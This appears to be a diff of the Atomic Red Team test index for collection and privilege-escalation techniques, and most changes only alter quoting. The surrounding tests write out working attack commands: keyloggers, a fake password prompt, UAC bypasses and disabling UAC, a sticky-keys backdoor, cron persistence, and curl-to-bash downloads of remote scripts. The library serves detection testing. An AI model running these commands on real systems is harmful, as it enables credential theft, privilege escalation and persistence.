/download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -7703,11 +7703,11 @@ collection: dependencies: - description: 'Winzip must be installed -' + ' prereq_command: 'cmd /c ''if not exist "#{winzip_exe}" (echo 1) else (echo 0)'' -' + ' get_prereq_command: | if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ Write-Host Follow the installation prompts to continue @@ -7727,7 +7727,7 @@ collection: auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198 description: 'Note: Requires 7zip installation -' + ' supported_platforms: - windows input_arguments: 
@@ -7742,10 +7742,10 @@ collection: dependencies: - description: '7zip tool must be installed at specified location (#{7zip_exe}) -' + ' prereq_command: 'if not exist "#{7zip_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading 7-zip installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer} @@ -7764,7 +7764,7 @@ collection: description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. -' + ' supported_platforms: - linux - macos @@ -7781,11 +7781,11 @@ collection: dependencies: - description: 'Files to zip must exist (#{input_files}) -' + ' prereq_command: 'if [ $(ls #{input_files} | wc -l) > 0 ] && [ -x $(which zip) ] ; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | (which yum && yum -y epel-release zip)||(which apt-get && apt-get install -y zip) echo Please set input_files argument to include files that exist @@ -7794,16 +7794,16 @@ collection: elevation_required: false command: 'zip #{output_file} #{input_files} -' + ' cleanup_command: 'rm -f #{output_file} -' + ' - name: Data Compressed - nix - gzip Single File auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. -' + ' supported_platforms: - linux - macos 
@@ -7823,16 +7823,16 @@ collection: command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}'' >> #{input_file}; gzip -k #{input_file}) -' + ' cleanup_command: 'rm -f #{input_file}.gz -' + ' - name: Data Compressed - nix - tar Folder or File auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. -' + ' supported_platforms: - linux - macos @@ -7848,28 +7848,28 @@ collection: dependencies: - description: 'Folder to zip must exist (#{input_file_folder}) -' + ' prereq_command: 'test -e #{input_file_folder} -' + ' get_prereq_command: 'echo Please set input_file_folder argument to a folder that exists -' + ' executor: name: sh elevation_required: false command: 'tar -cvzf #{output_file} #{input_file_folder} -' + ' cleanup_command: 'rm -f #{output_file} -' + ' - name: Data Encrypted with zip and gpg symmetric auto_generated_guid: '0286eb44-e7ce-41a0-b109-3da516e05a5f' description: 'Encrypt data for exiltration -' + ' supported_platforms: - macos - linux @@ -7892,7 +7892,7 @@ collection: prereq_command: 'if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)\n" executor: @@ -7906,7 +7906,7 @@ collection: ls -l #{test_folder} cleanup_command: 'rm -Rf #{test_folder} -' + ' T1123: technique: id: attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967 @@ -7956,7 +7956,7 @@ collection: executor: command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet -' + ' name: powershell T1119: technique: 
@@ -8026,7 +8026,7 @@ collection: for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >nul 2>&1 -' + ' name: command_prompt - name: Automated Collection PowerShell auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313 @@ -8042,7 +8042,7 @@ collection: cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force -ErrorAction Ignore | Out-Null -' + ' name: powershell - name: Recon information for export with PowerShell auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26 @@ -8131,7 +8131,7 @@ collection: auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7 description: 'Add data to clipboard to copy off or execute commands from. -' + ' supported_platforms: - windows executor: @@ -8141,14 +8141,14 @@ collection: clip < %temp%\T1115.txt cleanup_command: 'del %temp%\T1115.txt >nul 2>&1 -' + ' name: command_prompt - name: Execute Commands from Clipboard using PowerShell auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416 description: 'Utilize PowerShell to echo a command to clipboard and execute it -' + ' supported_platforms: - windows executor: @@ -8171,7 +8171,7 @@ collection: description: 'This module copies the data stored in the user''s clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt -' + ' supported_platforms: - windows input_arguments: @@ -8183,7 +8183,7 @@ collection: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -8194,7 +8194,7 @@ collection: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 
@@ -8204,7 +8204,7 @@ collection: cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore -' + ' name: powershell T1213.001: technique: @@ -8354,7 +8354,7 @@ collection: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications -' + ' supported_platforms: - windows input_arguments: @@ -8370,10 +8370,10 @@ collection: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) -' + ' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" -UseBasicParsing @@ -8926,7 +8926,7 @@ collection: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' -' + ' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 @@ -9097,7 +9097,7 @@ collection: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -9116,14 +9116,14 @@ collection: dependencies: - description: 'Checking if pam_tty_audit.so is installed -' + ' prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' -' + ' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" -' + ' supported_platforms: - linux executor: 
@@ -9154,14 +9154,14 @@ collection: - description: 'This test requires to be run in a bash shell and that logger and tee are installed. -' + ' prereq_command: | if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -9171,7 +9171,7 @@ collection: tail /var/log/syslog cleanup_command: 'unset PROMPT_COMMAND -' + ' - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 description: "When a command is executed in bash, the BASH_COMMAND variable @@ -9188,14 +9188,14 @@ collection: dependencies: - description: 'This test requires to be run in a bash shell -' + ' prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' input_arguments: output_file: name: output_file @@ -9211,7 +9211,7 @@ collection: cat #{output_file} cleanup_command: 'rm #{output_file} -' + ' - name: SSHD PAM keylogger auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. 
@@ -9219,20 +9219,20 @@ collection: of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. -' + ' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'This test requires sshd and auditd -' + ' prereq_command: | if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" -' + ' input_arguments: user_account: description: Basic ssh user account for testing. @@ -9246,7 +9246,7 @@ collection: restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n" cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/ -' + ' - name: Auditd keylogger auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af description: "The linux audit tool auditd can be used to capture 32 and 64 bit @@ -9258,14 +9258,14 @@ collection: dependencies: - description: 'This test requires sshd and auditd -' + ' prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -9274,7 +9274,7 @@ collection: $(date +\"%d/%m/%y %H:%M:%S\") \n" cleanup_command: 'systemctl restart auditd -' + ' T1557.001: technique: external_references: @@ -9448,17 +9448,17 @@ collection: command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile #{output_file} -' + ' cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore -' + ' name: powershell - name: Stage data from Discovery.sh auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066 description: 'Utilize curl to download discovery.sh and execute a basic information gathering shell script -' + ' supported_platforms: - linux - macos 
@@ -9471,7 +9471,7 @@ collection: command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file} -' + ' name: bash - name: Zip a Folder with PowerShell for Staging in Temp auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a @@ -9493,10 +9493,10 @@ collection: command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force -' + ' cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore -' + ' name: powershell T1114.001: technique: @@ -9567,23 +9567,23 @@ collection: dependencies: - description: 'Get-Inbox.ps1 must be located at #{file_path} -' + ' prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1" -OutFile "#{file_path}\Get-Inbox.ps1" -' + ' executor: command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1 -file #{output_file} -' + ' cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore -' + ' name: powershell T1185: technique: @@ -9923,7 +9923,7 @@ collection: or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware) -' + ' name: Screen Capture created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688 @@ -9955,7 +9955,7 @@ collection: auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac description: 'Use screencapture command to collect a full desktop screenshot -' + ' supported_platforms: - macos input_arguments: 
@@ -9966,16 +9966,16 @@ collection: executor: command: 'screencapture #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: bash - name: Screencapture (silent) auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 description: 'Use screencapture command to collect a full desktop screenshot -' + ' supported_platforms: - macos input_arguments: @@ -9986,17 +9986,17 @@ collection: executor: command: 'screencapture -x #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: bash - name: X Windows Capture auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac description: 'Use xwd command to collect a full desktop screenshot and review file with xwud -' + ' supported_platforms: - linux input_arguments: @@ -10018,11 +10018,11 @@ collection: dependencies: - description: 'Package with XWD and XWUD must exist on device -' + ' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi -' + ' get_prereq_command: "sudo #{package_installer} \n" executor: command: | @@ -10030,14 +10030,14 @@ collection: xwud -in #{output_file} cleanup_command: 'rm #{output_file} -' + ' name: bash - name: Capture Linux Desktop using Import Tool auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1 description: 'Use import command from ImageMagick to collect a full desktop screenshot -' + ' supported_platforms: - linux input_arguments: 
@@ -10048,28 +10048,28 @@ collection: dependencies: - description: 'ImageMagick must be installed -' + ' prereq_command: 'if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi -' + ' get_prereq_command: 'sudo apt-get -y install graphicsmagick-imagemagick-compat -' + ' executor: command: 'import -window root #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: bash - name: Windows Screencapture auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153 description: 'Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour -' + ' supported_platforms: - windows input_arguments: @@ -10091,7 +10091,7 @@ collection: cmd /c "timeout #{recording_time} > NULL && psr.exe /stop" cleanup_command: 'rm #{output_file} -ErrorAction Ignore -' + ' - name: Windows Screen Capture (CopyFromScreen) auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187 description: | @@ -10115,7 +10115,7 @@ collection: $bitmap.Save("#{output_file}") cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore -' + ' name: powershell T1213.002: technique: @@ -10505,7 +10505,7 @@ privilege-escalation: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" -' + ' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -10513,7 +10513,7 @@ privilege-escalation: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe -' + ' type: Path default: C:\windows\system32\cmd.exe executor: @@ -10547,7 +10547,7 @@ privilege-escalation: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe -' + ' supported_platforms: - windows executor: 
@@ -10558,7 +10558,7 @@ privilege-escalation: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe -' + ' name: command_prompt elevation_required: true T1547.014: @@ -10817,11 +10817,11 @@ privilege-escalation: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) -' + ' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -10830,11 +10830,11 @@ privilege-escalation: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) -' + ' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll @@ -10842,10 +10842,10 @@ privilege-escalation: executor: command: 'reg.exe import #{registry_file} -' + ' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1546.011: 
@@ -10953,31 +10953,31 @@ privilege-escalation: - description: 'Shim database file must exist on disk at specified location (#{file_path}) -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll -' + ' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} -' + ' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -11175,7 +11175,7 @@ privilege-escalation: description: 'This test submits a command to be run in the future by the `at` daemon. -' + ' supported_platforms: - linux input_arguments: 
@@ -11191,30 +11191,30 @@ privilege-escalation: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH -' + ' prereq_command: 'which at && which atd -' + ' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' -' + ' - description: 'The `atd` daemon must be running -' + ' prereq_command: 'systemctl status atd || service atd status -' + ' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' -' + ' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} -' + ' T1053.002: technique: external_references: @@ -11311,7 +11311,7 @@ privilege-escalation: elevation_required: false command: 'at 13:20 /interactive cmd -' + ' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -11640,7 +11640,7 @@ privilege-escalation: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -11662,7 +11662,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 @@ -11684,7 +11684,7 @@ privilege-escalation: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -11707,7 +11707,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f 
@@ -11730,7 +11730,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -11778,7 +11778,7 @@ privilege-escalation: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore -' + ' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -11791,11 +11791,11 @@ privilege-escalation: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f -' + ' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f -' + ' name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task @@ -11842,7 +11842,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11853,7 +11853,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11878,7 +11878,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11889,7 +11889,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore 
@@ -11913,7 +11913,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11924,7 +11924,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11949,7 +11949,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11960,7 +11960,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11984,7 +11984,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11995,7 +11995,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12019,7 +12019,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12030,7 +12030,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore 
@@ -12055,7 +12055,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12066,7 +12066,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12091,7 +12091,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12102,7 +12102,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12216,7 +12216,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -12261,7 +12261,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" 
@@ -12299,7 +12299,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -12416,10 +12416,10 @@ privilege-escalation: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} -' + ' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} -' + ' name: command_prompt elevation_required: true T1078.004: @@ -12485,7 +12485,7 @@ privilege-escalation: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. -' + ' supported_platforms: - google-workspace - windows @@ -12520,20 +12520,20 @@ privilege-escalation: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet -' + ' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud -' + ' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" -' + ' T1546.015: technique: external_references: @@ -12675,7 +12675,7 @@ privilege-escalation: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -12686,17 +12686,17 @@ privilege-escalation: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl get cronjobs -n #{namespace} -' + ' name: bash elevation_required: false - name: CreateCronjob 
@@ -12708,7 +12708,7 @@ privilege-escalation: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -12719,20 +12719,20 @@ privilege-escalation: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} -' + ' cleanup_command: 'kubectl delete cronjob art -n #{namespace} -' + ' name: bash elevation_required: false T1134.002: @@ -12932,7 +12932,7 @@ privilege-escalation: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. -' + ' supported_platforms: - macos - linux @@ -12952,7 +12952,7 @@ privilege-escalation: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil -' + ' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -12960,7 +12960,7 @@ privilege-escalation: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - macos - linux @@ -12992,7 +12992,7 @@ privilege-escalation: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -13009,10 +13009,10 @@ privilege-escalation: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} -' + ' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} -' + ' T1574.001: technique: id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 
@@ -13187,10 +13187,10 @@ privilege-escalation: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) -' + ' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -13198,7 +13198,7 @@ privilege-escalation: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 -' + ' name: command_prompt T1078.001: technique: @@ -13318,7 +13318,7 @@ privilege-escalation: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default -' + ' supported_platforms: - windows input_arguments: @@ -13329,10 +13329,10 @@ privilege-escalation: executor: command: 'net user #{guest_user} /active:yes -' + ' cleanup_command: 'net user #{guest_user} /active:no -' + ' name: command_prompt elevation_required: true T1078.002: @@ -13588,13 +13588,13 @@ privilege-escalation: Provider to be federated must be configured (outside of the scope of this test). -' + ' prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureADPreview -Force -' + ' executor: command: | Import-Module AzureADPreview 
